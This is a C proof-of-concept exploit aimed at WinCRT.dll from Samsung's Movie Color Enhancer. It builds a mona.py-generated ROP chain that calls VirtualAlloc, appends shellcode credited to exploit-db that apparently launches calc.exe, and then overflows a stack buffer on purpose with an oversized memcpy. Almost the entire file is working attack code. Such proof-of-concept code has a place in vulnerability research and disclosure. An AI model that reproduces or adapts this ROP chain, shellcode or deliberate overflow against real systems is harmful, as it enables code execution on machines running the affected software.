#include #include #include #define CREATE_ROP_CHAIN(name, ...) \ int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \ unsigned int name[name##_length / sizeof(unsigned int)]; \ create_rop_chain(name, ##__VA_ARGS__); int create_rop_chain(unsigned int *buf, unsigned int base_wincrt) { // rop chain generated with mona.py - www.corelan.be unsigned int rop_gadgets[] = { base_wincrt + 0x0000df9e, // POP EAX // POP ESI // RETN [WinCRT.dll] base_wincrt + 0x0001f0a8, // ptr to &VirtualAlloc() [IAT WinCRT.dll] 0x41414141, // Filler (compensate) base_wincrt + 0x00005bff, // MOV EAX,DWORD PTR DS:[EAX] // ADD CL,CL // RETN 0x08 [WinCRT.dll] base_wincrt + 0x0000431d, // PUSH EAX // ADD AL,5F // POP ESI // RETN [WinCRT.dll] 0x41414141, // Filler (RETN offset compensation) 0x41414141, // Filler (RETN offset compensation) base_wincrt + 0x00018392, // POP EBP // RETN [WinCRT.dll] base_wincrt + 0x00009558, // push esp # add al,2 # adc bl,al # xor eax,eax # retn [WinCRT.dll] base_wincrt + 0x00005f0c, // POP EBX // RETN [WinCRT.dll] 0x00001000, // 0x00001000-> ebx base_wincrt + 0x0001b39c, // XOR EDX,EDX // RETN [WinCRT.dll] base_wincrt + 0x000196e9, // POP ECX // RETN [WinCRT.dll] 0x90909090, // 0x90909090 -> ecx base_wincrt + 0x00014ca1, // MOV EAX,ECX // RETN [WinCRT.dll] base_wincrt + 0x0001175e, // ADD EDX,EBX // POP EBX // RETN 0x10 [WinCRT.dll] 0x41414141, // Filler (compensate) base_wincrt + 0x000196e9, // POP ECX // RETN [WinCRT.dll] 0x41414141, // Filler (RETN offset compensation) 0x41414141, // Filler (RETN offset compensation) 0x41414141, // Filler (RETN offset compensation) 0x41414141, // Filler (RETN offset compensation) 0x00000040, // 0x00000040-> ecx base_wincrt + 0x0000bd12, // POP EBX // RETN [WinCRT.dll] 0x00000001, // 0x00000001-> ebx base_wincrt + 0x0000f203, // POP EDI // RETN [WinCRT.dll] base_wincrt + 0x0000f204, // RETN (ROP NOP) [WinCRT.dll] base_wincrt + 0x0000c27e, // PUSHAD // ADD AL,0 // RETN [WinCRT.dll] }; if(buf != NULL) { memcpy(buf, rop_gadgets, sizeof(rop_gadgets)); }; return sizeof(rop_gadgets); } void hello() { // this user32 import will ensure that WinCRT.dll is loaded.. :) MessageBoxA(NULL, "Hello Samsung!", ":-)", 0); } void exploit() { // [WinCRT.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1 (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll) unsigned int base_wincrt = 0x10000000; static unsigned int rop_chain[256]; int rop_chain_length = create_rop_chain(rop_chain, base_wincrt); // http://www.exploit-db.com/exploits/28996/ memcpy(rop_chain + rop_chain_length/sizeof(int), "\x31\xf6\x56\x64\x8b\x76\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e" "\x08\x8b\x36\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b\x4b\x18" "\x67\xe3\xec\x8b\x7b\x20\x01\xef\x8b\x7c\x8f\xfc\x01\xef\x31" "\xc0\x99\x32\x17\x66\xc1\xca\x01\xae\x75\xf7\x66\x81\xfa\x10" "\xf5\xe0\xe2\x75\xcc\x8b\x53\x24\x01\xea\x0f\xb7\x14\x4a\x8b" "\x7b\x1c\x01\xef\x03\x2c\x97\x68\x2e\x65\x78\x65\x68\x63\x61" "\x6c\x63\x54\x87\x04\x24\x50\xff\xd5\xcc", 100); // go get 'em! char a[4]; memcpy(a+28, rop_chain, rop_chain_length + 113); } int main() { // need some stack to overwrite with the buffer overflow :p char super_size_me[512]; hello(); exploit(); }